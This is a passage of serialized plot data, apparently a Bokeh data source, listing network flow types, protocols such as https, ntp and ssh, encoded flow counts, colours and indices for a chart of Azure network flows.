",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\"],\"L7Protocol\":[\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"ms-wbt-server\",\"ms-wbt-server\",\"ms-wbt-server\",\"ms-wbt-server\",\"microsoft-ds\",\"microsoft-ds\",\"microsoft-ds\",\"microsoft-ds\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ntp\",\"ftp\",\"ssh\",\"ssh\",\"ssh\",\"ssh\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAAEEAAAAAAAAAyQAAAAAAAADJAAAAAAAAAAEAAAAAAAADwPwAAAAAAAPA/AAAAAAAAFEAAAAAAAAAUQAAAAAAAADBAAAAAAAAAMEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAEEAAAAAAAAA4QAAAAAAAADhAAAAAAAAAOEAAAAAAAAAQQAAAAAAAAABAAAAAAAAAGEAAAAAAAAAYQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAwQAAAAAAAADBAAAAAAAAA8D8AAAAAAADwPwAAAAAAADJAAAAAAAAAMkAAAAAAAAAUQAAAAAAAABRAAAAAAAAAAEAAAAAAAAAgQAAAAAAAACBAAAAAAAAAIEAAAAAAAAAQQAAAAAAAADBAAAAAAAAAMEAAAAAAAAAAQAAAAAAAADBAAAAAAAAAMEAAAAAAAADwPwAAAAAAAAhAAAAAAAAAAEAAAAAAAADwPwAAAAAAAPA/AAAAAAAAMUAAAAAAAAAcQAAAAAAAABxAAAAAAAAACEAAAAAAAAAIQAAAAAAAAAhAAAAAAAAAMUAAAAAAAADwPwAAAAAAAC5AAAAAAAAALkAAAAAAAAAuQAAAAAAAAC5AAAAAAAAAEEAAAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAQQAAAAAAAABBAAAAAAAAAFEAAAAAAAAAUQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAA8D8AAAAAAIBFQAAAAAAAgEVAAAAAAAAAPEAAAAAAAAA8QAAAAAAAAABAAAAAAAAAAEAAAAAAAAAcQAAAAAAAABxAAAAAAAAAHEAAAAAAAAAcQAAAAAAAABxAAAAAAAAAHEAAAAAAAAAYQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAzQAAAAAAAADNAAAAAAAAA8D8AAAAAAAAgQAAAAAAAACBAAAAAAAAAFEAAAAAAAAAUQAAAAAAAABRAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAADwPwAAAAAAACpAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAoQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAKkAAAAAAAADwPwAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAChAAAAAAAAAGEAAAAAAAAAYQAAAAAAAABhAAAAAAAAAAEAAAAAAAAAqQAAAAAAAACBAAAAAAAAAIEAAAAAAAADwPwAAAAAAAABAAAAAAAAAKEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAIkAAAAAAAAAiQAAAAAAAACJAAAAAAAAAIkAAAAAAAAAqQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAoQAAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAABAAAAAAAAA8D8AAAAAAAAqQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAqQAAAAAAAAPA/AAAAAAAAFEAAAAAAAAAUQAAAAAAAABRAAAAAAAAA8D8AAAAAAAAoQAAAAAAAAPA/AAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAAQAAAAAAAAChAAAAAAAAAEEAAAAAAAADwPwAAAAAAAPA/AAAAAAAAKkAAAAAAAADwPwAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAABAAAAAAAAAAEAAAAAAAAAUQAAAAAAAABRAAAAAAAAAKkAAAAAAAAAYQAAAAAAAABhAAAAAAAAAGEAAAAAAAADwPwAAAAAAACpAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAmQAAAAAAAAPA/AAAAAAAAFEAAAAAAAAAUQAAAAAAAABRAAAAAAAAA8D8AAAAAAADwPwAAAAAAACZAAAAAAAAACEAAAAAAAAAQQAAAAAAAAABAAAAAAAAAKkAAAAAAAADwPwAAAAAAABBAAAAAAAAA8D8AAAAAAAAoQAAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAPA/AAAAAAAALEAAAAAAAAAAQAAAAAAAABhAAAAAAAAAGEAAAAAAAAAcQAAAAAAAABxAAAAAAAAAKkAAAAAAAAAoQAAAAAAAAChAAAAAAAAAKEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAADVAAAAAAAAANUAAAAAAAAAIQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAUQAAAAAAAABRAAAAAAAAA8D8AAAAAAAAiQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAAQAAAAAAAAABAAAAAAAAA8D8AAAAAAADwPwAAAAAAADVAAAAAAAAANUAAAAAAAAAUQAAAAAAAABRAAAAAAAAAIkAAAAAAAAAiQAAAAAAAACJAAAAAAAAA8D8AAAAAAAAUQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAMEAAAAAAAAAwQAAAAAAAABBAAAAAAAAAEEAAAAAAAADwPwAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAABAAAAAAAAAMEAAAAAAAAAwQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAYQAAAAAAAABhAAAAAAAAAGEAAAAAAAADwPwAAAAAAADVAAAAAAAAANUAAAAAAAAAQQAAAAAAAABBAAAAAAAAA8D8AAAAAAAAUQAAAAAAAABRAAAAAAAAA8D8AAAAAAAAxQAAAAAAAADFAAAAAAAAACEAAAAAAAADwPwAAAAAAABhAAAAAAAAAGEAAAAAAAAAwQAAAAAAAADBAAAAAAAAAHEAAAAAAAAAcQAAAAAAAABxAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAiQAAAAAAAACJAAAAAAAAA8D8AAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAyQAAAAAAAADJAAAAAAAAAAEAAAAAAAADwPwAAAAAAAAhAAAAAAAAA8D8AAAAAAAA6QAAAAAAAADpAAAAAAAAAFEAAAAAAAAAUQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAQQAAAAAAAACJAAAAAAAAAIkAAAAAAAAAiQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAAAAANkAAAAAAAAA2QAAAAAAAAABAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAACEAAAAAAAAAIQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAyQAAAAAAAADJAAAAAAAAAEEAAAAAAAADwPwAAAAAAADFAAAAAAAAAMUAAAAAAAADwPwAAAAAAAPA/AAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAACEAAAAAAAAAxQAAAAAAAADFAAAAAAAAAEEAAAAAAAADwPwAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAPA/AAAAAAAA8D8AAAAAAAAzQAAAAAAAADNAAAAAAAAA8D8AAAAAAAAAQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAAMkAAAAAAAAAyQAAAAAAAABhAAAAAAAAAGEAAAAAAAAAQQAAAAAAAABBAAAAAAAAA8D8AAAAAAAAwQAAAAAAAADBAAAAAAAAAEEAAAAAAAAAQQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAgERAAAAAAACAREAAAAAAAIBEQAAAAAAAgERAAAAAAACAREAAAAAAAIBEQAAAAAAAgERAAAAAAAAAAEAAAAAAAAAAQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAJEAAAAAAAADwPwAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAAPA/AAAAAAAAAEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAAEAAAAAAAAAAQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAAQAAAAAAAAABAAAAAAAAACEAAAAAAAAAIQAAAAAAAAABAAAAAAAAAJkAAAAAAAAAIQAAAAAAAAABAAAAAAAAAGEAAAAAAAAAYQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAQQAAAAAAAABRAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAACEAAAAAAAAAQQAAAAAAAAAhAAAAAAAAAEEAAAAAAAAAIQAAAAAAAABBAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAGEAAAAAAAADwPwAAAAAAAPA/AAAAAAAAKEA=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[460]},\"color\":[\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#1EA087\",\"#1EA087\",\"#1EA087\",\"#1EA087\",\"#277E8E\",\"#277E8E\",\"#277E8E\",\"#277E8E\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#49C16D\",\"#440154\",\"#9DD93A\",\"#9DD93A\",\"#9DD93A\",\"#9DD93A\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459],\"y_index\":[2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,4,4,4,4,3,3,3,3,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5